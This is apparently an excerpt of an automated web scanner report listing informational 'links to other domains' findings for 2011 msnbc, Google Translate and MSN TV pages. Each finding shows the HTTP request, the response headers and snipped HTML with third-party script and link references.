http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/rosagolijan-657197656.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/technolog2/5962123.jpg
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23279
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23279
http://www.polls.newsvine.com/_vine/js/pierre?v=2673&lib=jquery&addwidgets=zinger,wetbar
http://www.popsci.com/
http://www.popularmechanics.com/
http://www.scidev.net/
http://www.scienceblog.com/cms/index.php
http://www.scienceblogs.com/
http://www.sciencenews.org/
http://www.scientificamerican.com/blog/observations/
http://www.signonsandiego.com/news/blogs/science-quest/
http://www.space.com/
http://www.spacedaily.com/
http://www.spacepolitics.com/
http://www.thecaseforpluto.com/
http://www.thecaseforpluto.com/cover.jpg
http://www.thespacereview.com/
http://www.transterrestrial.com/
http://www.twitter.com/MAlexJohnson
http://www.twitter.com/suzannechoney
http://www.twitter.com/wjrothman
http://www.unmannedspaceflight.com/
http://www.youtube.com/v/O1tNXWpmA5I&hl=en_US&fs=1
http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://twitter.com/ToddKenreck
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.msn.com

Request

GET /_news/2011/01/31/5962042-quadriplegic-man-sets-record-for-fastest-hands-free-typing?GT1=43001 HTTP/1.1
Host: technolog.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.198. http://today.msnbc.msn.com/id/41299602/ns/today-today_fashion_and_beauty/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://today.msnbc.msn.com
Path:	/id/41299602/ns/today-today_fashion_and_beauty/

Issue detail

The page was loaded from a URL containing a query string:

http://today.msnbc.msn.com/id/41299602/ns/today-today_fashion_and_beauty/?gt1=43001

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?
http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://community.todaymoms.com/
http://dateline.msnbc.com/
http://hardball.msnbc.com/
http://msn.whitepages.com/
http://mtp.msnbc.com/
http://nightly.msnbc.com/
http://rachel.msnbc.com/
http://service.collarity.com/cust/msnbc/ucs.js
http://today.msnbc.com/
http://todayshow.us.intellitxt.com/intellitxt/front.asp?ipid=10502
http://tv.msnbc.com/
http://twitter.com/share
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.delish.com/
http://www.everyblock.com/
http://www.hotmail.com/
http://www.newsvine.com/
http://www.totalbeauty.com/beauty-tips?lc=msn1042
http://www.totalbeauty.com/content/article/dry-hair-treatments
http://www.totalbeauty.com/content/gallery/happy-hour-makeup
http://www.totalbeauty.com/content/gallery/makeover-mondays-anna
http://www.totalbeauty.com/content/gallery/new-year-hair-makeovers
http://www.totalbeauty.com/content/gallery/p_17_styles?lc=msn1042
http://www.totalbeauty.com/content/gallery/p_drugstore_shampoos?lc=msn1042
http://www.totalbeauty.com/content/gallery/tips-gorgeous-curls
http://www.totalbeauty.com/editors_blogs/health-and-beauty-treatments-that-could-save-your-life
http://www.totalbeauty.com/editors_blogs/kate-middletons-wedding-hairstyle-what-do-you-think
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /id/41299602/ns/today-today_fashion_and_beauty/?gt1=43001 HTTP/1.1
Host: today.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Cache-Control: private, max-age=170
Date: Wed, 02 Feb 2011 15:42:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61691

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link type="text/css" rel="stylesheet" media="print" href="http://assets1d.msnbc.msn.com/rendering/msnbc/html40/assets/site_wide_print.css" />

<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
<noscript>
<img src="http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?" width="1" height="1" alt="" />
</noscript>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
<a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
<li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a></li>
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a></li>
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a></li>
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a></li>
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="todayshow" data-related="msnbc" data-url="http://today.msnbc.msn.com/id/41299602/ns/today-today_fashion_and_beauty/"></a>
...[SNIP]...
<li><a href="http://www.totalbeauty.com/beauty-tips?lc=msn1042"><strong>
...[SNIP]...
<li><a href="http://www.totalbeauty.com/content/gallery/p_drugstore_shampoos?lc=msn1042"><strong>
...[SNIP]...
<li><a href="http://www.totalbeauty.com/content/gallery/p_17_styles?lc=msn1042"><strong>
...[SNIP]...
<li><a href="http://www.totalbeauty.com/beauty-tips?lc=msn1042"><strong>
...[SNIP]...
<li><a href="http://www.totalbeauty.com/content/gallery/p_drugstore_shampoos?lc=msn1042"><strong>
...[SNIP]...
<li><a href="http://www.totalbeauty.com/content/gallery/p_17_styles?lc=msn1042"><strong>
...[SNIP]...
<li><a href="http://www.totalbeauty.com/beauty-tips?lc=msn1042"><strong>
...[SNIP]...
<li><a href="http://www.totalbeauty.com/content/gallery/p_drugstore_shampoos?lc=msn1042"><strong>
...[SNIP]...
<li><a href="http://www.totalbeauty.com/content/gallery/p_17_styles?lc=msn1042"><strong>
...[SNIP]...
<li class="i1 " about="http://www.totalbeauty.com/content/gallery/tips-gorgeous-curls">

<a class="h4" href="http://www.totalbeauty.com/content/gallery/tips-gorgeous-curls">

<span property="dc:title">
...[SNIP]...
<li class="i2 " about="http://www.totalbeauty.com/content/gallery/new-year-hair-makeovers">

<a class="h6" href="http://www.totalbeauty.com/content/gallery/new-year-hair-makeovers">

<span property="dc:title">
...[SNIP]...
<li class="i3 " about="http://www.totalbeauty.com/editors_blogs/health-and-beauty-treatments-that-could-save-your-life">

<a class="h6" href="http://www.totalbeauty.com/editors_blogs/health-and-beauty-treatments-that-could-save-your-life">

<span property="dc:title">
...[SNIP]...
<li class="i4 " about="http://www.totalbeauty.com/content/article/dry-hair-treatments">

<a class="h6" href="http://www.totalbeauty.com/content/article/dry-hair-treatments">

<span property="dc:title">
...[SNIP]...
<li class="i5 " about="http://www.totalbeauty.com/editors_blogs/kate-middletons-wedding-hairstyle-what-do-you-think">

<a class="h6" href="http://www.totalbeauty.com/editors_blogs/kate-middletons-wedding-hairstyle-what-do-you-think">

<span property="dc:title">
...[SNIP]...
<li class="i6 " about="http://www.totalbeauty.com/content/gallery/happy-hour-makeup">

<a class="h6" href="http://www.totalbeauty.com/content/gallery/happy-hour-makeup">

<span property="dc:title">
...[SNIP]...
<li class="i7 " about="http://www.totalbeauty.com/content/gallery/makeover-mondays-anna">

<a class="h6" href="http://www.totalbeauty.com/content/gallery/makeover-mondays-anna">

<span property="dc:title">
...[SNIP]...
<li class="i4"><a href="http://community.todaymoms.com/">TODAY Moms</a>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
<li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a></li>
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a></li>
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a></li>
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a></li>
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...

<script type="text/javascript" src="http://todayshow.us.intellitxt.com/intellitxt/front.asp?ipid=10502"></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

17.199. http://today.msnbc.msn.com/id/41302280/ns/today-entertainment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://today.msnbc.msn.com
Path:	/id/41302280/ns/today-entertainment/

Issue detail

The page was loaded from a URL containing a query string:

http://today.msnbc.msn.com/id/41302280/ns/today-entertainment/?gt1=43001

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?
http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://community.todaymoms.com/
http://dateline.msnbc.com/
http://hardball.msnbc.com/
http://moms.today.com/_news/2011/01/29/5942612-is-hot-saucing-discipline-or-abuse
http://msn.whitepages.com/
http://mtp.msnbc.com/
http://nightly.msnbc.com/
http://rachel.msnbc.com/
http://scoop.todayshow.com/_news/2011/02/02/5975349-sorry-james-franco-wont-be-dressing-as-cher-at-the-oscars
http://service.collarity.com/cust/msnbc/ucs.js
http://theclicker.todayshow.com/_news/2011/01/13/5832961-little-girl-freaks-out-during-toddlers-tiaras-eyebrow-wax
http://theclicker.todayshow.com/_news/2011/02/01/5968130-russell-hantz-accused-of-leaking-survivor-info
http://theclicker.todayshow.com/_news/2011/02/01/5971613-behind-the-scenes-at-puppy-bowl-vii
http://theclicker.todayshow.com/_news/2011/02/02/5970586-jersey-shores-vinny-snooki-isnt-my-type
http://today.msnbc.com/
http://todayshow.us.intellitxt.com/intellitxt/front.asp?ipid=10508
http://tv.msnbc.com/
http://twitter.com/share
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.delish.com/
http://www.everyblock.com/
http://www.hotmail.com/
http://www.newsvine.com/
http://www.polls.newsvine.com/_vine/images/av/60x60/vine.gif
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /id/41302280/ns/today-entertainment/?gt1=43001 HTTP/1.1
Host: today.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Cache-Control: private, max-age=180
Date: Wed, 02 Feb 2011 15:42:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61312

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link type="text/css" rel="stylesheet" media="print" href="http://assets1a.msnbc.msn.com/rendering/msnbc/html40/assets/site_wide_print.css" />

<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
<noscript>
<img src="http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?" width="1" height="1" alt="" />
</noscript>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
<a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
<li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a></li>
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a></li>
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a></li>
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a></li>
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="todayshow" data-related="msnbc" data-url="http://today.msnbc.msn.com/id/41302280/ns/today-entertainment/"></a>
...[SNIP]...
<div class="img">
<a href="http://theclicker.todayshow.com/_news/2011/02/01/5968130-russell-hantz-accused-of-leaking-survivor-info"
rel="media:image enclosure" type="image/jpeg">
<img alt="Image: Russell Hantz" src="http://msnbcmedia1.msn.com/j/MSNBC/Components/Photo/_new/110113-ent-survivor-russell.grid-2x2.jpg" width="142" height="114" class="photo" />
...[SNIP]...
</div>
<a class="h5" href="http://theclicker.todayshow.com/_news/2011/02/01/5968130-russell-hantz-accused-of-leaking-survivor-info">

<span property="dc:title">
...[SNIP]...
<li class="i4 " about="http://theclicker.todayshow.com/_news/2011/02/01/5971613-behind-the-scenes-at-puppy-bowl-vii">

<a class="h6" href="http://theclicker.todayshow.com/_news/2011/02/01/5971613-behind-the-scenes-at-puppy-bowl-vii">

<span property="dc:title">
...[SNIP]...
</p>
<a href="http://theclicker.todayshow.com/_news/2011/01/13/5832961-little-girl-freaks-out-during-toddlers-tiaras-eyebrow-wax">Girl freaks out during 'Toddlers' eyebrow wax</a>
...[SNIP]...
</p>
<a href="http://moms.today.com/_news/2011/01/29/5942612-is-hot-saucing-discipline-or-abuse">Is 'hot saucing' discipline or abuse?</a>
...[SNIP]...
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="todayshow" data-related="msnbc" data-url="http://today.msnbc.msn.com/id/41302280/ns/today-entertainment/"></a>
...[SNIP]...
<p class="meta"><a href="http://www.newsvine.com/" class="jump count">Discussion comments</a>
...[SNIP]...
<div>
<a href="http://www.newsvine.com/" class="jump">View all <span class="count">
...[SNIP]...
<div>
<a href="http://www.newsvine.com/" title="Add your comment on Newsvine" class="jump">Leave your comment</a>
...[SNIP]...
<div class="img">
<a href="http://www.newsvine.com" title="Add your profile on Newsvine">
<img src="http://www.polls.newsvine.com/_vine/images/av/60x60/vine.gif" width="60" height="60" alt="Add your profile on Newsvine" />
</a>
...[SNIP]...
<li class="i3 " about="http://theclicker.todayshow.com/_news/2011/02/02/5970586-jersey-shores-vinny-snooki-isnt-my-type">

<a class="h6" href="http://theclicker.todayshow.com/_news/2011/02/02/5970586-jersey-shores-vinny-snooki-isnt-my-type">

<span property="dc:title">
...[SNIP]...
<li class="i5 " about="http://theclicker.todayshow.com/_news/2011/02/01/5968130-russell-hantz-accused-of-leaking-survivor-info">

<a class="h6" href="http://theclicker.todayshow.com/_news/2011/02/01/5968130-russell-hantz-accused-of-leaking-survivor-info">

<span property="dc:title">
...[SNIP]...
<li class="i4 " about="http://scoop.todayshow.com/_news/2011/02/02/5975349-sorry-james-franco-wont-be-dressing-as-cher-at-the-oscars">

<a class="h6" href="http://scoop.todayshow.com/_news/2011/02/02/5975349-sorry-james-franco-wont-be-dressing-as-cher-at-the-oscars">

<span property="dc:title">
...[SNIP]...
<li class="i4"><a href="http://community.todaymoms.com/">TODAY Moms</a>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
<li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a></li>
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a></li>
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a></li>
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a></li>
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...

<script type="text/javascript" src="http://todayshow.us.intellitxt.com/intellitxt/front.asp?ipid=10508"></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

17.200. http://translate.google.com/translate_t previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.google.com
Path:	/translate_t

Issue detail

The page was loaded from a URL containing a query string:

http://translate.google.com/translate_t?q=millenium+boston&um=1&ie=UTF-8&sa=N&hl=en&tab=wT

The response contains the following links to other domains:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://www.youtube.com/results?q=millenium+boston&um=1&ie=UTF-8&hl=en&sa=N&tab=T1

Request

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:42:18 GMT
Expires: Wed, 02 Feb 2011 15:42:18 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=11a27dc8823c6265:TM=1296661338:LM=1296661338:S=XxDI3af9TXnEOKKO; expires=Fri, 01-Feb-2013 15:42:18 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=millenium+boston&um=1&ie=UTF-8&hl=en&sa=N&tab=T1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<div id="input_tts_button" style="" class=" tts_vertical_bt"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="input_tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...
<div id="tts_button" style="" class=" "><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...

17.201. http://translate.google.com/translate_t previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.google.com
Path:	/translate_t

Issue detail

The page was loaded from a URL containing a query string:

http://translate.google.com/translate_t?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wT

The response contains the following links to other domains:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://www.youtube.com/results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=T1

Request

GET /translate_t?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wT HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:42:19 GMT
Expires: Wed, 02 Feb 2011 15:42:19 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=501eb963d9fc16b2:TM=1296661339:LM=1296661339:S=265MEfi6Z7Kh_5s-; expires=Fri, 01-Feb-2013 15:42:19 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=T1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<div id="input_tts_button" style="" class=" tts_vertical_bt"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="input_tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...
<div id="tts_button" style="" class=" "><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...

17.202. http://tv.msn.com/last-night-on-tv/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tv.msn.com
Path:	/last-night-on-tv/

Issue detail

The page was loaded from a URL containing a query string:

http://tv.msn.com/last-night-on-tv/?from=en-us_msnhp&Gt1=28150

The response contains the following links to other domains:

http://choice.live.com/default.aspx
http://download.live.com/?sku=messenger
http://entcss.s-msn.com/App_Themes/IE7/IE79613.css
http://entcss.s-msn.com/i/lnotv/bud55/css/lnotv_main_bud55_005.css
http://entcss.s-msn.com/styles/e9613.css
http://entcss.s-msn.com/styles/entertainment9613.css
http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css
http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://entimg.s-msn.com/i/grandprix/msft.png
http://entimg.s-msn.com/i/grandprix/nav_pipe.gif
http://entimg.s-msn.com/i/ms/ms_logo.gif
http://entimg.s-msn.com/i/sp.gif
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/resources/neutral/launchhelp.js
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalent.112.2o7.net/b/ss/msnportalent/1/H.1--NS/0
http://twitter.com/msn_lnotv
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?Form=BC
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/msn-entertainment
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661345&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Ftv.msn.com%2Flast-night-on-tv%2F%3Ffrom%3Den-us_msnhp%26Gt1%3D28150&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2ftv.msn.com%2flast-night-on-tv%2f%3ffrom%3den-us_msnhp%26Gt1%3d28150%26ppcb%3d
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /last-night-on-tv/?from=en-us_msnhp&Gt1=28150 HTTP/1.1
Host: tv.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 34073
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=ee17d7dd219344fa8147134519fc4ca4; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Server: wba30
Date: Wed, 02 Feb 2011 15:42:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Last Night
...[SNIP]...
<link rel="shortcut icon" href="http://blstc.msn.com/br/gbl/lg/1/favicon.ico" /><link rel="stylesheet" href="http://entcss.s-msn.com/styles/entertainment9613.css" rev="stylesheet" type="text/css"/><link rel="stylesheet" href="http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css" rev="stylesheet" type="text/css"/>
<link rel="stylesheet" href="http://entcss.s-msn.com/styles/e9613.css" rev="stylesheet" type="text/css"/>
<style>
...[SNIP]...
</style>
<link rel="stylesheet" href="http://entcss.s-msn.com/App_Themes/IE7/IE79613.css" rev="stylesheet" type="text/css"/><script type="text/javascript" src="http://ads.msn.com/library/dap.js">
...[SNIP]...
</script>

